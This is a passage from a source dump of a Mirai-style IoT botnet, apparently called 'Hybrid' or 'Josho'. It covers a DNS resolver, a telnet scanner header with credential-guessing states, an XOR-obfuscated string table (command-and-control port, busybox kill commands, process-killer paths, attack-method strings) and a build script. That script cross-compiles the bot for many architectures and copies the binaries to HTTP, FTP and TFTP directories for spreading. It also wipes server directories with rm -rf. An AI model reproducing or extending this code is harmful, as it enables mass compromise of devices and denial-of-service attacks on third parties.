| } 67 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/rand.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define PHI 0x9e3779b9 6 | 7 | void rand_init(void); 8 | uint32_t rand_next(void); 9 | void rand_str(char *, int); 10 | void rand_alpha_str(uint8_t *, int); 11 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/resolv.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | #ifdef DEBUG 4 | #include 5 | #endif 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | #include "includes.h" 16 | #include "resolv.h" 17 | #include "util.h" 18 | #include "rand.h" 19 | #include "protocol.h" 20 | 21 | void resolv_domain_to_hostname(char *dst_hostname, char *src_domain) 22 | { 23 | int len = util_strlen(src_domain) + 1; 24 | char *lbl = dst_hostname, *dst_pos = dst_hostname + 1; 25 | uint8_t curr_len = 0; 26 | 27 | while (len-- > 0) 28 | { 29 | char c = *src_domain++; 30 | 31 | if (c == '.' || c == 0) 32 | { 33 | *lbl = curr_len; 34 | lbl = dst_pos++; 35 | curr_len = 0; 36 | } 37 | else 38 | { 39 | curr_len++; 40 | *dst_pos++ = c; 41 | } 42 | } 43 | *dst_pos = 0; 44 | } 45 | 46 | static void resolv_skip_name(uint8_t *reader, uint8_t *buffer, int *count) 47 | { 48 | unsigned int jumped = 0, offset; 49 | *count = 1; 50 | while(*reader != 0) 51 | { 52 | if(*reader >= 192) 53 | { 54 | offset = (*reader)*256 + *(reader+1) - 49152; 55 | reader = buffer + offset - 1; 56 | jumped = 1; 57 | } 58 | reader = reader+1; 59 | if(jumped == 0) 60 | *count = *count + 1; 61 | } 62 | 63 | if(jumped == 1) 64 | *count = *count + 1; 65 | } 66 | 67 | struct resolv_entries *resolv_lookup(char *domain) 68 | { 69 | struct resolv_entries *entries = calloc(1, sizeof (struct resolv_entries)); 70 | char query[2048], response[2048]; 71 | struct dnshdr *dnsh = (struct dnshdr *)query; 72 | char *qname = (char *)(dnsh + 1); 73 | 74 | resolv_domain_to_hostname(qname, domain); 75 | 76 | struct dns_question *dnst = (struct dns_question *)(qname + util_strlen(qname) + 1); 77 | struct sockaddr_in addr = {0}; 78 | int query_len = sizeof (struct dnshdr) + util_strlen(qname) + 1 + sizeof (struct dns_question); 79 | int tries = 0, fd = -1, i = 0; 80 | uint16_t dns_id = rand_next() % 0xffff; 81 | 82 | util_zero(&addr, sizeof (struct sockaddr_in)); 83 | addr.sin_family = AF_INET; 84 | addr.sin_addr.s_addr = INET_ADDR(8,8,8,8); 85 | addr.sin_port = htons(53); 86 | 87 | // Set up the dns query 88 | dnsh->id = dns_id; 89 | dnsh->opts = htons(1 << 8); // Recursion desired 90 | dnsh->qdcount = htons(1); 91 | dnst->qtype = htons(PROTO_DNS_QTYPE_A); 92 | dnst->qclass = htons(PROTO_DNS_QCLASS_IP); 93 | 94 | while (tries++ < 5) 95 | { 96 | fd_set fdset; 97 | struct timeval timeo; 98 | int nfds; 99 | 100 | if (fd != -1) 101 | close(fd); 102 | if ((fd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) 103 | { 104 | #ifdef DEBUG 105 | printf("[resolv] Failed to create socket\n"); 106 | #endif 107 | sleep(1); 108 | continue; 109 | } 110 | 111 | if (connect(fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in)) == -1) 112 | { 113 | #ifdef DEBUG 114 | printf("[resolv] Failed to call connect on udp socket\n"); 115 | #endif 116 | sleep(1); 117 | continue; 118 | } 119 | 120 | if (send(fd, query, query_len, MSG_NOSIGNAL) == -1) 121 | { 122 | #ifdef DEBUG 123 | printf("[resolv] Failed to send packet: %d\n", errno); 124 | #endif 125 | sleep(1); 126 | continue; 127 | } 128 | 129 | fcntl(F_SETFL, fd, O_NONBLOCK | fcntl(F_GETFL, fd, 0)); 130 | FD_ZERO(&fdset); 131 | FD_SET(fd, &fdset); 132 | 133 | timeo.tv_sec = 5; 134 | timeo.tv_usec = 0; 135 | nfds = select(fd + 1, &fdset, NULL, NULL, &timeo); 136 | 137 | if (nfds == -1) 138 | { 139 | #ifdef DEBUG 140 | printf("[resolv] select() failed\n"); 141 | #endif 142 | break; 143 | } 144 | else if (nfds == 0) 145 | { 146 | #ifdef DEBUG 147 | printf("[resolv] Couldn't resolve %s in time. %d tr%s\n", domain, tries, tries == 1 ? "y" : "ies"); 148 | #endif 149 | continue; 150 | } 151 | else if (FD_ISSET(fd, &fdset)) 152 | { 153 | #ifdef DEBUG 154 | printf("[resolv] Got response from select\n"); 155 | #endif 156 | int ret = recvfrom(fd, response, sizeof (response), MSG_NOSIGNAL, NULL, NULL); 157 | char *name; 158 | struct dnsans *dnsa; 159 | uint16_t ancount; 160 | int stop; 161 | 162 | if (ret < (sizeof (struct dnshdr) + util_strlen(qname) + 1 + sizeof (struct dns_question))) 163 | continue; 164 | 165 | dnsh = (struct dnshdr *)response; 166 | qname = (char *)(dnsh + 1); 167 | dnst = (struct dns_question *)(qname + util_strlen(qname) + 1); 168 | name = (char *)(dnst + 1); 169 | 170 | if (dnsh->id != dns_id) 171 | continue; 172 | if (dnsh->ancount == 0) 173 | continue; 174 | 175 | ancount = ntohs(dnsh->ancount); 176 | while (ancount-- > 0) 177 | { 178 | struct dns_resource *r_data = NULL; 179 | 180 | resolv_skip_name(name, response, &stop); 181 | name = name + stop; 182 | 183 | r_data = (struct dns_resource *)name; 184 | name = name + sizeof(struct dns_resource); 185 | 186 | if (r_data->type == htons(PROTO_DNS_QTYPE_A) && r_data->_class == htons(PROTO_DNS_QCLASS_IP)) 187 | { 188 | if (ntohs(r_data->data_len) == 4) 189 | { 190 | uint32_t *p; 191 | uint8_t tmp_buf[4]; 192 | for(i = 0; i < 4; i++) 193 | tmp_buf[i] = name[i]; 194 | 195 | p = (uint32_t *)tmp_buf; 196 | 197 | entries->addrs = realloc(entries->addrs, (entries->addrs_len + 1) * sizeof (ipv4_t)); 198 | entries->addrs[entries->addrs_len++] = (*p); 199 | #ifdef DEBUG 200 | printf("[resolv] Found IP address: %08x\n", (*p)); 201 | #endif 202 | } 203 | 204 | name = name + ntohs(r_data->data_len); 205 | } else { 206 | resolv_skip_name(name, response, &stop); 207 | name = name + stop; 208 | } 209 | } 210 | } 211 | 212 | break; 213 | } 214 | 215 | close(fd); 216 | 217 | #ifdef DEBUG 218 | printf("Resolved %s to %d IPv4 addresses\n", domain, entries->addrs_len); 219 | #endif 220 | 221 | if (entries->addrs_len > 0) 222 | return entries; 223 | else 224 | { 225 | resolv_entries_free(entries); 226 | return NULL; 227 | } 228 | } 229 | 230 | void resolv_entries_free(struct resolv_entries *entries) 231 | { 232 | if (entries == NULL) 233 | return; 234 | if (entries->addrs != NULL) 235 | free(entries->addrs); 236 | free(entries); 237 | } 238 | 239 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/resolv.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "includes.h" 4 | 5 | struct resolv_entries { 6 | uint8_t addrs_len; 7 | ipv4_t *addrs; 8 | }; 9 | 10 | void resolv_domain_to_hostname(char *, char *); 11 | struct resolv_entries *resolv_lookup(char *); 12 | void resolv_entries_free(struct resolv_entries *); 13 | 14 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/scanner.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #include "includes.h" 6 | 7 | #ifdef DEBUG 8 | #define SCANNER_MAX_CONNS 256 9 | #define SCANNER_RAW_PPS 384 10 | #else 11 | #define SCANNER_MAX_CONNS 256 12 | #define SCANNER_RAW_PPS 384 13 | #endif 14 | 15 | #define SCANNER_RDBUF_SIZE 256 16 | #define SCANNER_HACK_DRAIN 64 17 | 18 | struct scanner_auth { 19 | char *username; 20 | char *password; 21 | uint16_t weight_min, weight_max; 22 | uint8_t username_len, password_len; 23 | }; 24 | 25 | struct scanner_connection { 26 | struct scanner_auth *auth; 27 | int fd, last_recv; 28 | enum { 29 | SC_CLOSED, 30 | SC_CONNECTING, 31 | SC_HANDLE_IACS, 32 | SC_WAITING_USERNAME, 33 | SC_WAITING_PASSWORD, 34 | SC_WAITING_PASSWD_RESP, 35 | SC_WAITING_ENABLE_RESP, 36 | SC_WAITING_SYSTEM_RESP, 37 | SC_WAITING_SHELL_RESP, 38 | SC_WAITING_SH_RESP, 39 | SC_WAITING_TOKEN_RESP 40 | } state; 41 | ipv4_t dst_addr; 42 | uint16_t dst_port; 43 | int rdbuf_pos; 44 | char rdbuf[SCANNER_RDBUF_SIZE]; 45 | uint8_t tries; 46 | }; 47 | 48 | void scanner_init(); 49 | void scanner_kill(void); 50 | 51 | static void setup_connection(struct scanner_connection *); 52 | static ipv4_t get_random_ip(void); 53 | 54 | static int consume_iacs(struct scanner_connection *); 55 | static int consume_any_prompt(struct scanner_connection *); 56 | static int consume_user_prompt(struct scanner_connection *); 57 | static int consume_pass_prompt(struct scanner_connection *); 58 | static int consume_resp_prompt(struct scanner_connection *); 59 | 60 | static void add_auth_entry(char *, char *, uint16_t); 61 | static struct scanner_auth *random_auth_entry(void); 62 | static void report_working(ipv4_t, uint16_t, struct scanner_auth *); 63 | static char *deobf(char *, int *); 64 | static BOOL can_consume(struct scanner_connection *, uint8_t *, int); 65 | 66 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/table.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | #ifdef DEBUG 4 | #include 5 | #endif 6 | #include 7 | #include 8 | 9 | #include "includes.h" 10 | #include "table.h" 11 | #include "util.h" 12 | 13 | uint32_t table_key = 0xdedefbaf; 14 | struct table_value table[TABLE_MAX_KEYS]; 15 | 16 | void table_init(void) 17 | { 18 | // scanner and domain shit!! 19 | 20 | // 961 21 | add_entry(TABLE_CNC_PORT, "\x56\xCE", 2); 22 | // 1676 23 | add_entry(TABLE_SCAN_CB_PORT, "\x52\xD8", 2); 24 | // DaddyL33T Infected Your Shit 25 | add_entry(TABLE_EXEC_SUCCESS, "\x10\x35\x30\x30\x2D\x18\x67\x67\x00\x74\x1D\x3A\x32\x31\x37\x20\x31\x30\x74\x0D\x3B\x21\x26\x74\x07\x3C\x3D\x20\x54", 29); 26 | // shell 27 | add_entry(TABLE_SCAN_SHELL, "\x27\x3C\x31\x38\x38\x54", 6); 28 | // enable 29 | add_entry(TABLE_SCAN_ENABLE, "\x31\x3A\x35\x36\x38\x31\x54", 7); 30 | // system 31 | add_entry(TABLE_SCAN_SYSTEM, "\x27\x2D\x27\x20\x31\x39\x54", 7); 32 | // sh 33 | add_entry(TABLE_SCAN_SH, "\x27\x3C\x54", 3); 34 | // /bin/busybox JOSHO 35 | add_entry(TABLE_SCAN_QUERY, "\x7B\x36\x3D\x3A\x7B\x36\x21\x27\x2D\x36\x3B\x2C\x74\x1E\x1B\x07\x1C\x1B\x54", 19); 36 | // JOSHO: applet not found 37 | add_entry(TABLE_SCAN_RESP, "\x1E\x1B\x07\x1C\x1B\x6E\x74\x35\x24\x24\x38\x31\x20\x74\x3A\x3B\x20\x74\x32\x3B\x21\x3A\x30\x54", 24); 38 | // ncorrect 39 | add_entry(TABLE_SCAN_NCORRECT, "\x3A\x37\x3B\x26\x26\x31\x37\x20\x54", 9); 40 | // /bin/busybox ps 41 | add_entry(TABLE_SCAN_PS, "\x7B\x36\x3D\x3A\x7B\x36\x21\x27\x2D\x36\x3B\x2C\x74\x24\x27\x54", 16); 42 | // /bin/busybox kill -9 43 | add_entry(TABLE_SCAN_KILL_9, "\x7B\x36\x3D\x3A\x7B\x36\x21\x27\x2D\x36\x3B\x2C\x74\x3F\x3D\x38\x38\x74\x79\x6D\x74\x54", 22); 44 | 45 | // killer shit!! 46 | 47 | // /proc/ 48 | add_entry(TABLE_KILLER_PROC, "\x7B\x24\x26\x3B\x37\x7B\x54", 7); 49 | // /exe 50 | add_entry(TABLE_KILLER_EXE, "\x7B\x31\x2C\x31\x54", 5); 51 | // /fd 52 | add_entry(TABLE_KILLER_FD, "\x7B\x32\x30\x54", 4); 53 | // /maps 54 | add_entry(TABLE_KILLER_MAPS, "\x7B\x39\x35\x24\x27\x54", 6); 55 | // /proc/net/tcp 56 | add_entry(TABLE_KILLER_TCP, "\x7B\x24\x26\x3B\x37\x7B\x3A\x31\x20\x7B\x20\x37\x24\x54", 14); 57 | // /status 58 | add_entry(TABLE_KILLER_STATUS, "\x7B\x27\x20\x35\x20\x21\x27\x54", 8); 59 | // .anime 60 | add_entry(TABLE_KILLER_ANIME, "\x7A\x35\x3A\x3D\x39\x31\x54", 7); 61 | // /proc/net/route 62 | add_entry(TABLE_MEM_ROUTE, "\x7B\x24\x26\x3B\x37\x7B\x3A\x31\x20\x7B\x26\x3B\x21\x20\x31\x54", 16); 63 | // assword 64 | add_entry(TABLE_MEM_ASSWD, "\x35\x27\x27\x23\x3B\x26\x30\x54", 8); 65 | 66 | 67 | // methods shit!! 68 | 69 | // TSource Engine Query 70 | add_entry(TABLE_ATK_VSE, "\x00\x07\x3B\x21\x26\x37\x31\x74\x11\x3A\x33\x3D\x3A\x31\x74\x05\x21\x31\x26\x2D\x54", 21); 71 | // /etc/resolv.conf 72 | add_entry(TABLE_ATK_RESOLVER, "\x7B\x31\x20\x37\x7B\x26\x31\x27\x3B\x38\x22\x7A\x37\x3B\x3A\x32\x54", 17); 73 | // nameserver 74 | add_entry(TABLE_ATK_NSERV, "\x3A\x35\x39\x31\x27\x31\x26\x22\x31\x26\x74\x54", 12); 75 | 76 | // strings encryption shit!! 77 | 78 | // /dev/watchdog 79 | add_entry(TABLE_MISC_WATCHDOG, "\x7B\x30\x31\x22\x7B\x23\x35\x20\x37\x3C\x30\x3B\x33\x54", 14); 80 | // /dev/misc/watchdog 81 | add_entry(TABLE_MISC_WATCHDOG2, "\x7B\x30\x31\x22\x7B\x39\x3D\x27\x37\x7B\x23\x35\x20\x37\x3C\x30\x3B\x33\x54", 19); 82 | // assword 83 | add_entry(TABLE_SCAN_ASSWORD, "\x24\x36\x36\x32\x2A\x37\x21\x45", 8); 84 | // ogin 85 | add_entry(TABLE_SCAN_OGIN, "\x3B\x33\x3D\x3A\x54", 5); 86 | // enter 87 | add_entry(TABLE_SCAN_ENTER, "\x31\x3A\x20\x31\x26\x54", 6); 88 | // 1gba4cdom53nhp12ei0kfj 89 | add_entry(TABLE_MISC_RAND, "\x65\x33\x36\x35\x60\x37\x30\x3B\x39\x61\x67\x3A\x3C\x24\x65\x66\x31\x3D\x64\x3F\x32\x3E\x54", 23); 90 | } 91 | 92 | void table_unlock_val(uint8_t id) 93 | { 94 | struct table_value *val = &table[id]; 95 | 96 | #ifdef DEBUG 97 | if (!val->locked) 98 | { 99 | printf("[table] Tried to double-unlock value %d\n", id); 100 | return; 101 | } 102 | #endif 103 | 104 | toggle_obf(id); 105 | } 106 | 107 | void table_lock_val(uint8_t id) 108 | { 109 | struct table_value *val = &table[id]; 110 | 111 | #ifdef DEBUG 112 | if (val->locked) 113 | { 114 | printf("[table] Tried to double-lock value\n"); 115 | return; 116 | } 117 | #endif 118 | 119 | toggle_obf(id); 120 | } 121 | 122 | char *table_retrieve_val(int id, int *len) 123 | { 124 | struct table_value *val = &table[id]; 125 | 126 | #ifdef DEBUG 127 | if (val->locked) 128 | { 129 | printf("[table] Tried to access table.%d but it is locked\n", id); 130 | return NULL; 131 | } 132 | #endif 133 | 134 | if (len != NULL) 135 | *len = (int)val->val_len; 136 | return val->val; 137 | } 138 | 139 | static void add_entry(uint8_t id, char *buf, int buf_len) 140 | { 141 | char *cpy = malloc(buf_len); 142 | 143 | util_memcpy(cpy, buf, buf_len); 144 | 145 | table[id].val = cpy; 146 | table[id].val_len = (uint16_t)buf_len; 147 | #ifdef DEBUG 148 | table[id].locked = TRUE; 149 | #endif 150 | } 151 | 152 | static void toggle_obf(uint8_t id) 153 | { 154 | int i; 155 | struct table_value *val = &table[id]; 156 | uint8_t k1 = table_key & 0xff, 157 | k2 = (table_key >> 8) & 0xff, 158 | k3 = (table_key >> 16) & 0xff, 159 | k4 = (table_key >> 24) & 0xff; 160 | 161 | for (i = 0; i < val->val_len; i++) 162 | { 163 | val->val[i] ^= k1; 164 | val->val[i] ^= k2; 165 | val->val[i] ^= k3; 166 | val->val[i] ^= k4; 167 | } 168 | 169 | #ifdef DEBUG 170 | val->locked = !val->locked; 171 | #endif 172 | } 173 | 174 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/table.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "includes.h" 5 | 6 | struct table_value 7 | { 8 | char *val; 9 | uint16_t val_len; 10 | 11 | #ifdef DEBUG 12 | BOOL locked; 13 | #endif 14 | }; 15 | #define TABLE_CNC_PORT 1 16 | #define TABLE_SCAN_CB_PORT 2 17 | #define TABLE_EXEC_SUCCESS 3 18 | #define TABLE_SCAN_SHELL 4 19 | #define TABLE_SCAN_ENABLE 5 20 | #define TABLE_SCAN_SYSTEM 6 21 | #define TABLE_SCAN_SH 7 22 | #define TABLE_SCAN_QUERY 8 23 | #define TABLE_SCAN_RESP 9 24 | #define TABLE_SCAN_NCORRECT 10 25 | #define TABLE_SCAN_PS 11 26 | #define TABLE_SCAN_KILL_9 12 27 | #define TABLE_KILLER_PROC 13 28 | #define TABLE_KILLER_EXE 14 29 | #define TABLE_KILLER_FD 15 30 | #define TABLE_KILLER_MAPS 16 31 | #define TABLE_KILLER_TCP 17 32 | #define TABLE_MEM_ROUTE 18 33 | #define TABLE_MEM_ASSWD 19 34 | #define TABLE_ATK_VSE 20 35 | #define TABLE_ATK_RESOLVER 21 36 | #define TABLE_ATK_NSERV 22 37 | #define TABLE_MISC_WATCHDOG 23 38 | #define TABLE_MISC_WATCHDOG2 24 39 | #define TABLE_SCAN_ASSWORD 25 40 | #define TABLE_SCAN_OGIN 26 41 | #define TABLE_SCAN_ENTER 27 42 | #define TABLE_MISC_RAND 28 43 | #define TABLE_KILLER_STATUS 29 44 | #define TABLE_KILLER_ANIME 30 45 | 46 | #define TABLE_MAX_KEYS 31 47 | 48 | void table_init(void); 49 | void table_unlock_val(uint8_t); 50 | void table_lock_val(uint8_t); 51 | char *table_retrieve_val(int, int *); 52 | 53 | static void add_entry(uint8_t, char *, int); 54 | static void toggle_obf(uint8_t); 55 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/util.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | #ifdef DEBUG 4 | #include 5 | #endif 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #include "includes.h" 18 | #include "util.h" 19 | #include "table.h" 20 | 21 | int util_strlen(char *str) 22 | { 23 | int c = 0; 24 | 25 | while(*str++ != 0) 26 | c++; 27 | 28 | return c; 29 | } 30 | 31 | 32 | BOOL util_strncmp(char *str1, char *str2, int len) 33 | { 34 | int l1 = util_strlen(str1), l2 = util_strlen(str2); 35 | 36 | if(l1 < len || l2 < len) 37 | return FALSE; 38 | 39 | while(len--) 40 | { 41 | if(*str1++ != *str2++) 42 | return FALSE; 43 | } 44 | 45 | return TRUE; 46 | } 47 | 48 | BOOL util_strcmp(char *str1, char *str2) 49 | { 50 | int l1 = util_strlen(str1), l2 = util_strlen(str2); 51 | 52 | if(l1 != l2) 53 | return FALSE; 54 | 55 | while(l1--) 56 | { 57 | if(*str1++ != *str2++) 58 | return FALSE; 59 | } 60 | 61 | return TRUE; 62 | } 63 | 64 | int util_strcpy(char *dst, char *src) 65 | { 66 | int l = util_strlen(src); 67 | 68 | util_memcpy(dst, src, l + 1); 69 | 70 | return l; 71 | } 72 | 73 | void util_strcat(char *dest, char *src) 74 | { 75 | while(*dest != '\0') 76 | *dest++; 77 | do 78 | { 79 | *dest++ = *src++; 80 | } 81 | while(*src != '\0'); 82 | } 83 | 84 | void util_memcpy(void *dst, void *src, int len) 85 | { 86 | char *r_dst = (char *)dst; 87 | char *r_src = (char *)src; 88 | while(len--) 89 | *r_dst++ = *r_src++; 90 | } 91 | 92 | void util_zero(void *buf, int len) 93 | { 94 | char *zero = buf; 95 | while(len--) 96 | *zero++ = 0; 97 | } 98 | 99 | int util_atoi(char *str, int base) 100 | { 101 | unsigned long acc = 0; 102 | int c; 103 | unsigned long cutoff; 104 | int neg = 0, any, cutlim; 105 | 106 | do 107 | { 108 | c = *str++; 109 | } 110 | while(util_isspace(c)); 111 | 112 | if(c == '-') 113 | { 114 | neg = 1; 115 | c = *str++; 116 | } 117 | else if(c == '+') 118 | c = *str++; 119 | 120 | cutoff = neg ? -(unsigned long)LONG_MIN : LONG_MAX; 121 | cutlim = cutoff % (unsigned long)base; 122 | cutoff /= (unsigned long)base; 123 | for(acc = 0, any = 0;; c = *str++) 124 | { 125 | if(util_isdigit(c)) 126 | c -= '0'; 127 | else if(util_isalpha(c)) 128 | c -= util_isupper(c) ? 'A' - 10 : 'a' - 10; 129 | else 130 | break; 131 | 132 | if(c >= base) 133 | break; 134 | 135 | if(any < 0 || acc > cutoff || acc == cutoff && c > cutlim) 136 | any = -1; 137 | else 138 | { 139 | any = 1; 140 | acc *= base; 141 | acc += c; 142 | } 143 | } 144 | 145 | if(any < 0) 146 | { 147 | acc = neg ? LONG_MIN : LONG_MAX; 148 | } 149 | else if(neg) 150 | acc = -acc; 151 | 152 | return (acc); 153 | } 154 | 155 | char *util_itoa(int value, int radix, char *string) 156 | { 157 | if(string == NULL) 158 | return NULL; 159 | 160 | if(value != 0) 161 | { 162 | char scratch[34]; 163 | int neg = 0; 164 | int offset = 0; 165 | int c = 0; 166 | unsigned int accum; 167 | 168 | offset = 32; 169 | scratch[33] = 0; 170 | 171 | if(radix == 10 && value < 0) 172 | { 173 | neg = 1; 174 | accum = -value; 175 | } 176 | else 177 | { 178 | neg = 0; 179 | accum = (unsigned int)value; 180 | } 181 | 182 | while(accum) 183 | { 184 | c = accum % radix; 185 | if(c < 10) 186 | c += '0'; 187 | else 188 | c += 'A' - 10; 189 | 190 | scratch[offset] = c; 191 | accum /= radix; 192 | offset--; 193 | } 194 | 195 | if(neg) 196 | scratch[offset] = '-'; 197 | else 198 | offset++; 199 | 200 | util_strcpy(string, &scratch[offset]); 201 | } 202 | else 203 | { 204 | string[0] = '0'; 205 | string[1] = 0; 206 | } 207 | 208 | return string; 209 | } 210 | 211 | int util_memsearch(char *buf, int buf_len, char *mem, int mem_len) 212 | { 213 | int i = 0, matched = 0; 214 | 215 | if(mem_len > buf_len) 216 | return -1; 217 | 218 | for(i = 0; i < buf_len; i++) 219 | { 220 | if(buf[i] == mem[matched]) 221 | { 222 | if(++matched == mem_len) 223 | return i + 1; 224 | } 225 | else 226 | matched = 0; 227 | } 228 | 229 | return -1; 230 | } 231 | 232 | int util_stristr(char *haystack, int haystack_len, char *str) 233 | { 234 | char *ptr = haystack; 235 | int str_len = util_strlen(str); 236 | int match_count = 0; 237 | 238 | while(haystack_len-- > 0) 239 | { 240 | char a = *ptr++; 241 | char b = str[match_count]; 242 | a = a >= 'A' && a <= 'Z' ? a | 0x60 : a; 243 | b = b >= 'A' && b <= 'Z' ? b | 0x60 : b; 244 | 245 | if(a == b) 246 | { 247 | if(++match_count == str_len) 248 | return (ptr - haystack); 249 | } 250 | else 251 | match_count = 0; 252 | } 253 | 254 | return -1; 255 | } 256 | 257 | ipv4_t util_local_addr(void) 258 | { 259 | int fd = 0; 260 | struct sockaddr_in addr; 261 | socklen_t addr_len = sizeof(addr); 262 | 263 | errno = 0; 264 | if((fd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) 265 | { 266 | #ifdef DEBUG 267 | printf("[util] Failed to call socket(), errno = %d\n", errno); 268 | #endif 269 | return 0; 270 | } 271 | 272 | addr.sin_family = AF_INET; 273 | addr.sin_addr.s_addr = INET_ADDR(8,8,8,8); 274 | addr.sin_port = htons(53); 275 | 276 | connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)); 277 | 278 | getsockname(fd, (struct sockaddr *)&addr, &addr_len); 279 | close(fd); 280 | 281 | return addr.sin_addr.s_addr; 282 | } 283 | 284 | char *util_fdgets(char *buffer, int buffer_size, int fd) 285 | { 286 | int got = 0, total = 0; 287 | do 288 | { 289 | got = read(fd, buffer + total, 1); 290 | total = got == 1 ? total + 1 : total; 291 | } 292 | while(got == 1 && total < buffer_size && *(buffer + (total - 1)) != '\n'); 293 | 294 | return total == 0 ? NULL : buffer; 295 | } 296 | 297 | static inline int util_isupper(char c) 298 | { 299 | return (c >= 'A' && c <= 'Z'); 300 | } 301 | 302 | static inline int util_isalpha(char c) 303 | { 304 | return ((c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z')); 305 | } 306 | 307 | static inline int util_isspace(char c) 308 | { 309 | return (c == ' ' || c == '\t' || c == '\n' || c == '\12'); 310 | } 311 | 312 | static inline int util_isdigit(char c) 313 | { 314 | return (c >= '0' && c <= '9'); 315 | } 316 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/util.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "includes.h" 4 | 5 | int util_strlen(char *); 6 | BOOL util_strncmp(char *, char *, int); 7 | BOOL util_strcmp(char *, char *); 8 | int util_strcpy(char *, char *); 9 | void util_strcat(char *, char *); 10 | void util_memcpy(void *, void *, int); 11 | void util_zero(void *, int); 12 | int util_atoi(char *, int); 13 | char *util_itoa(int, int, char *); 14 | int util_memsearch(char *, int, char *, int); 15 | int util_stristr(char *, int, char *); 16 | ipv4_t util_local_addr(void); 17 | char *util_fdgets(char *, int, int); 18 | 19 | static inline int util_isupper(char); 20 | static inline int util_isalpha(char); 21 | static inline int util_isspace(char); 22 | static inline int util_isdigit(char); 23 | 24 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | export PATH=$PATH:/etc/xcompile/armv4l/bin 3 | export PATH=$PATH:/etc/xcompile/armv5l/bin 4 | export PATH=$PATH:/etc/xcompile/armv6l/bin 5 | export PATH=$PATH:/etc/xcompile/armv7l/bin 6 | export PATH=$PATH:/etc/xcompile/i586/bin 7 | export PATH=$PATH:/etc/xcompile/m68k/bin 8 | export PATH=$PATH:/etc/xcompile/mips/bin 9 | export PATH=$PATH:/etc/xcompile/mipsel/bin 10 | export PATH=$PATH:/etc/xcompile/powerpc/bin 11 | export PATH=$PATH:/etc/xcompile/sh4/bin 12 | export PATH=$PATH:/etc/xcompile/sparc/bin 13 | export GOROOT=/usr/local/go; export GOPATH=$HOME/Projects/Proj1; export PATH=$GOPATH/bin:$GOROOT/bin:$PATH; go get github.com/go-sql-driver/mysql; go get github.com/mattn/go-shellwords 14 | function compile_bot { 15 | "$1-gcc" -std=c99 $3 bot/*.c -O3 -fomit-frame-pointer -fdata-sections -ffunction-sections -Wl,--gc-sections -o release/"$2" -DMIRAI_BOT_ARCH=\""$1"\" 16 | "$1-strip" release/"$2" -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr 17 | } 18 | FLAGS="" 19 | domain="" 20 | domainres="" 21 | if [ "$1" == "domain" ] 22 | then 23 | domain="-DUSEDOMAIN" 24 | domainres=" with domain" 25 | fi 26 | rm -rf ~/release 27 | mkdir ~/release 28 | rm -rf /var/www/html 29 | rm -rf /var/lib/tftpboot 30 | rm -rf /var/ftp 31 | mkdir /var/ftp 32 | mkdir /var/lib/tftpboot 33 | mkdir /var/www/html 34 | mkdir /var/www/html/AB4g5 35 | go build -o loader/cnc cnc/*.go 36 | rm -rf ~/cnc 37 | mv ~/loader/cnc ~/ 38 | go build -o loader/scanListen scanListen.go 39 | echo "COMPILING i586$domainres" 40 | compile_bot i586 Josho.x86 "$FLAGS $domain -static" 41 | echo "COMPILING mips$domainres" 42 | compile_bot mips Josho.mips "$FLAGS $domain -static" 43 | echo "COMPILING mipsel$domainres" 44 | compile_bot mipsel Josho.mpsl "$FLAGS $domain -static" 45 | echo "COMPILING armv4l$domainres" 46 | compile_bot armv4l Josho.arm "$FLAGS $domain -static" 47 | echo "COMPILING armv5l$domainres" 48 | compile_bot armv5l Josho.arm5 "$FLAGS $domain" 49 | echo "COMPILING armv6l$domainres" 50 | compile_bot armv6l Josho.arm6 "$FLAGS $domain -static" 51 | echo "COMPILING armv7l$domainres" 52 | compile_bot armv7l Josho.arm7 "$FLAGS $domain -static" 53 | echo "COMPILING ppc$domainres" 54 | compile_bot powerpc Josho.ppc "$FLAGS $domain -static" 55 | echo "COMPILING sparc$domainres" 56 | compile_bot sparc Josho.spc "$FLAGS $domain -static" 57 | echo "COMPILING m68k$domainres" 58 | compile_bot m68k Josho.m68k "$FLAGS $domain -static" 59 | echo "COMPILING sh4$domainres" 60 | compile_bot sh4 Josho.sh4 "$FLAGS $domain -static" 61 | cp release/Josho* /var/www/html/AB4g5 62 | cp release/Josho* /var/ftp 63 | mv release/Josho* /var/lib/tftpboot 64 | rm -rf release 65 | ################################################################### 66 | gcc -static -O3 -lpthread -pthread ~/loader/src/*.c -o ~/loader/loader 67 | ################################################################### 68 | armv4l-gcc -Os -D BOT_ARCH=\"arm\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.arm 69 | armv5l-gcc -Os -D BOT_ARCH=\"arm5\" -D ARM -Wl,--gc-sections -fdata-sections 